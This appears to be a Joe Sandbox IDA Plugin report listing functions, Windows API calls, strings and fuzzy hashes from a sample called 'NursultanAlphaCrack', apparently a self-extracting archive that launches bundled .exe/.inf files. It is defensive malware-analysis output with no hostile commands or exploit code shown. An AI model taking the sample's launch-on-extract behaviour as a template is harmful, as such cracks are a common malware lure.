Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: da6a1de8fc0db86c4a9f0dd9478efab099d831f6c46460e9d1bf9c71f37bd91b
Instruction ID: 4e6bd0076f93fef982aaf4e5384decf9b71f27a810b005d33cc1250c594ba9c3
Opcode Fuzzy Hash: da6a1de8fc0db86c4a9f0dd9478efab099d831f6c46460e9d1bf9c71f37bd91b
Instruction Fuzzy Hash: 0731BE71145342BBE311DF60BC4EFAB7BACEB86704F000509F691D62A1DF688B068B76

Function 001DD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 001DD7AE
ShellExecuteExW.SHELL32(?), ref: 001DD8DE
ShowWindow.USER32(?,00000000), ref: 001DD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 001DD959
CloseHandle.KERNEL32(?), ref: 001DD97F
ShowWindow.USER32(?,00000001), ref: 001DD9E1

Strings

.exe, xrefs: 001DD989
.inf, xrefs: 001DD89A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: d9282a0e09118f60d363cb78ad230034201946c45befde4d33c7b29969def351
Instruction ID: 20aab3fae5dedb5e4c8b44d38e5f93a5a3c1f84e73f7623b11ae7966ae1fa228
Opcode Fuzzy Hash: d9282a0e09118f60d363cb78ad230034201946c45befde4d33c7b29969def351
Instruction Fuzzy Hash: 63510370008380AADB319F24B854BBBBBE4AF91748F04041FF5C0973A1EB768E84DB52

Function 001EA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001E5695,001E5695,?,?,?,001EABAC,00000001,00000001,2DE85006), ref: 001EA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001EABAC,00000001,00000001,2DE85006,?,?,?), ref: 001EAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001EAB35
__freea.LIBCMT ref: 001EAB42

Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38

__freea.LIBCMT ref: 001EAB4B
__freea.LIBCMT ref: 001EAB70

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2dfb06de45cf70bf2f6ec62be99ddc470a76a0c992905a6678af38788b8bcb18
Instruction ID: a04cc3d3a21487d037f330507d0d990e36f40a2afdfc6b885f34863e11964855
Opcode Fuzzy Hash: 2dfb06de45cf70bf2f6ec62be99ddc470a76a0c992905a6678af38788b8bcb18
Instruction Fuzzy Hash: 1851F672600A56AFDB258F66CC41EBFB7AAEF84750F954629FC04D7140EB34EC40C6A2

Function 001E3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,001E3C35,?,?,00222088,00000000,?,001E3D60,00000004,InitializeCriticalSectionEx,001F6394,InitializeCriticalSectionEx,00000000), ref: 001E3C03

Strings

api-ms-, xrefs: 001E3BC3

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: d7d825bbf7892015d26f5a8bb83d32cae72867517f85291b4d86085664df72ea
Instruction ID: e108bbc6aa66896656272c837e604d46255fb3586c6fb37e156e3cd88de0ec5d
Opcode Fuzzy Hash: d7d825bbf7892015d26f5a8bb83d32cae72867517f85291b4d86085664df72ea
Instruction Fuzzy Hash: 1F112C31A04A64ABCB328B5A9C49B5E77649F01770F250111F936FB290D731EF40C6D1

Function 001DABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 001DABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 001DABF9

Part of subcall function 001D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001CC116,00000000,.exe,?,?,00000800,?,?,?,001D8E3C), ref: 001D1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 001DABE9

Strings

EDIT, xrefs: 001DABCD, 001DABD8, 001DABE5
@Uxu, xrefs: 001DABF9

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Uxu$EDIT
API String ID: 4243998846-59804995
Opcode ID: c2a1e0fb229bcb10e2476ac05c37098b1b7b618394404aac0215e3a35bc06563
Instruction ID: 70150190ebba79f8dc81f151c1a514a24841e72f4a2592ce606960b8d562b6f1
Opcode Fuzzy Hash: c2a1e0fb229bcb10e2476ac05c37098b1b7b618394404aac0215e3a35bc06563
Instruction Fuzzy Hash: 11F0823260122877DB30D764AC09F9B76AC9F46B40F484013BA05B22C0D766DF4685BA

Function 001C98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,001C7760,?,00000005,?,00000011), ref: 001C995F
GetLastError.KERNEL32(?,?,001C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,001C7760,?,00000005,?), ref: 001C99A2
GetLastError.KERNEL32(?,?,001C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C99F9

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 33e97bc0644a1826e738e630919bbc0221633a12ca9c946d1837d5627cafa01b
Instruction ID: 3f63196131a73f6c27d79911592a0f5b7ea92e0d62e3b6eda509fb97f7c6bc86
Opcode Fuzzy Hash: 33e97bc0644a1826e738e630919bbc0221633a12ca9c946d1837d5627cafa01b
Instruction Fuzzy Hash: 363122305447856FE7309F24CC4AFEABB94BB24324F200B1EF9A1965D0D7B4E994CB91

Function 001DB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
TranslateMessage.USER32(?), ref: 001DB5AC
DispatchMessageW.USER32(?), ref: 001DB5B6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: a1bd96d773d7e3ae8ab262bd0afcb0cad83b5d323b4750806ff12bbec9aeeeef
Instruction ID: 338b96a6b022573fda107849bb13f3b8a129707242fa1582db6cb1d8777d6240
Opcode Fuzzy Hash: a1bd96d773d7e3ae8ab262bd0afcb0cad83b5d323b4750806ff12bbec9aeeeef
Instruction Fuzzy Hash: 3BF0BD71A0121ABBCB20DBE5BC4CDDB7FACEE056917004415B50AD2110EB38D606CBB4

Function 001DAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
Part of subcall function 001D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858

OleInitialize.OLE32(00000000), ref: 001DAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001DAC66
SHGetMalloc.SHELL32(00208438), ref: 001DAC70

Strings

riched20.dll, xrefs: 001DAC1E

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: a8985894e7de425044b6af7ebcef4e001e79199194faf8ed0d33aa342bb9f242
Instruction ID: 29faab795745b9f0fac9a15e8cd2b982688308c79f2405b18d423aac4999cfa9
Opcode Fuzzy Hash: a8985894e7de425044b6af7ebcef4e001e79199194faf8ed0d33aa342bb9f242
Instruction Fuzzy Hash: EEF0FFB1D00209ABCB20AFA9D8499EFFBFCEF94700F004156A455A2241DBB856068BA1

Function 001DDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001DDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001DDC30

Strings

sfxcmd, xrefs: 001DDBEF
sfxpar, xrefs: 001DDC2B

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: b1206c3547104c31eebc6d7f23ff7759b142409e78409c872914efd0144dba58
Instruction ID: 2c3aba76f04c75a412bafd557e263a5e8ebb1b585528f2d586dd4cdba4d59a80
Opcode Fuzzy Hash: b1206c3547104c31eebc6d7f23ff7759b142409e78409c872914efd0144dba58
Instruction Fuzzy Hash: 08F0ECB24182287BCB212F949C06FFA3B58AF14781F040416FE8596251D7B09980D6B0

Function 001C9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001C9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001C97AD
GetLastError.KERNEL32 ref: 001C97DF
GetLastError.KERNEL32 ref: 001C97FE

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 55b258f9a661f87c3eb4b969d3dede887ea97487de8b342aba0d475418ec35a0
Instruction ID: 66901646bbf471dfdb62fa4aecbdbe87ca96a36400226c79e25ebb2e1318e66e
Opcode Fuzzy Hash: 55b258f9a661f87c3eb4b969d3dede887ea97487de8b342aba0d475418ec35a0
Instruction Fuzzy Hash: 14117C71910308EBDF205F64C808F6977A9BB62320F10892EF42686590DB74DE84DB61

Function 001EAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001CD710,00000000,00000000,?,001EACDB,001CD710,00000000,00000000,00000000,?,001EAED8,00000006,FlsSetValue), ref: 001EAD66
GetLastError.KERNEL32(?,001EACDB,001CD710,00000000,00000000,00000000,?,001EAED8,00000006,FlsSetValue,001F7970,FlsSetValue,00000000,00000364,?,001E98B7), ref: 001EAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001EACDB,001CD710,00000000,00000000,00000000,?,001EAED8,00000006,FlsSetValue,001F7970,FlsSetValue,00000000), ref: 001EAD80

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: dc00ae8801858fc52d7d8fc9ee83308478a009e2755698518ba82c19779cf6ef
Instruction ID: 6160d771bd8ccef5dbf81d4da642c7ca601d6f0741c05561e04d4299b6f0866d
Opcode Fuzzy Hash: dc00ae8801858fc52d7d8fc9ee83308478a009e2755698518ba82c19779cf6ef
Instruction Fuzzy Hash: 2E012036201672BBC7314BEADC449AFBF58FF057637550620F91AD3950D721E841C6E1

Function 001C9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,001CD343,00000001,?,?,?,00000000,001D551D,?,?,?), ref: 001C9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,001D551D,?,?,?,?,?,001D4FC7,?), ref: 001C9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,001CD343,00000001,?,?), ref: 001CA011

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: a0c972e8f39059f32b6a920fa7d0ec61179484b58887ff1c50b2d97ab97238c8
Instruction ID: 9deccfc82cc79dfc4938fa8164c7e6b1e948da52678f1ded46b06e60be15cdac
Opcode Fuzzy Hash: a0c972e8f39059f32b6a920fa7d0ec61179484b58887ff1c50b2d97ab97238c8
Instruction Fuzzy Hash: F131BE31204309AFDB15CF20D819F6A7BA5EFA4755F00461DF8819B290CB75ED98CBA2

Function 001CA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 001CC27E: _wcslen.LIBCMT ref: 001CC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA30C
GetLastError.KERNEL32(?,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA329

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 86f992fbaa6e2b9b0e2352b41320cc96e62d98afa7253a0250c20a3384d5deee
Instruction ID: 55bfb2a58ab09150aa4b5203ea10daaa4b798a02ae28fb859b310822ef080af0
Opcode Fuzzy Hash: 86f992fbaa6e2b9b0e2352b41320cc96e62d98afa7253a0250c20a3384d5deee
Instruction Fuzzy Hash: 6C0128312002686AEF23ABB04C59FFD3748AF39789F84041DF901D6181DB54CA81C7B2

Function 001EB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 001EB8B8

Strings

, xrefs: 001EB8FD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 9d801a6414fdbcd374c45e94f6135950154b99a878a77aead8a622db59666fce
Instruction ID: 6462c3b4d0f370ada5efd22d3b9539f7f13fa0a220bcb7f7cb207872c0725f22
Opcode Fuzzy Hash: 9d801a6414fdbcd374c45e94f6135950154b99a878a77aead8a622db59666fce
Instruction Fuzzy Hash: 5741F7B05086CC9ADF258E668CC4BFBBBA9DB55308F1404EDE6DA87143D335AA45CB60

Function 001EAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 001EAFDD

Strings

LCMapStringEx, xrefs: 001EAF7D, 001EAF87

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 7bcb2efd6cc048d7297a7a81d2d4a25671ed8a0ab869f56578d4681767ff59ee
Instruction ID: dda8db9e50c914455d8f9f11208ff6e5dd8c31d60ae3a013129429756fa68e80
Opcode Fuzzy Hash: 7bcb2efd6cc048d7297a7a81d2d4a25671ed8a0ab869f56578d4681767ff59ee
Instruction Fuzzy Hash: 9701133250420EBBCF12AF91DC02DAE7F62EF08764F414155FE1426160CB729A71EB81

Function 001EAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,001EA56F), ref: 001EAF55

Strings

InitializeCriticalSectionEx, xrefs: 001EAF1B, 001EAF25

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: eaf310d281594462eb37ccad36fa00e69206e8229b959cd8bd699de76f107416
Instruction ID: 10f500c328716fcd60dd9649464b0409fac511c2c4fcf269176723d099708893
